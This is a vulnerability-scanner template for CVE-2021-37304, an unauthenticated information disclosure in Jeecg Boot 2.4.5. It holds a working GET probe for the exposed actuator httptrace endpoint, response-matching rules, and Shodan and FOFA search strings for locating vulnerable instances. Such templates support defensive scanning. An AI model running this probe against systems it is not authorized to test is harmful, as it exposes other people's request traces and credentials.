id: CVE-2021-37304

info:
  name: Jeecg Boot <= 2.4.5 - Information Disclosure
  author: ritikchaddha
  severity: high
  verified: true
  description: |
    An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.
    SHODAN: title:"Jeecg-Boot"
    FOFA: title="JeecgBoot 企业级低代码平台"
  reference:
    - https://github.com/jeecgboot/jeecg-boot/issues/2793
    - https://nvd.nist.gov/vuln/detail/CVE-2021-37304
  tags: cve,cve2021,jeecg,exposure
  created: 2023/06/16

rules:
  r0:
    request:
      method: GET
      path: /jeecg-boot/actuator/httptrace/
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"traces":[') &&
      response.body.bcontains(b'"headers"') &&
      response.body.bcontains(b'"request":{')
expression: r0()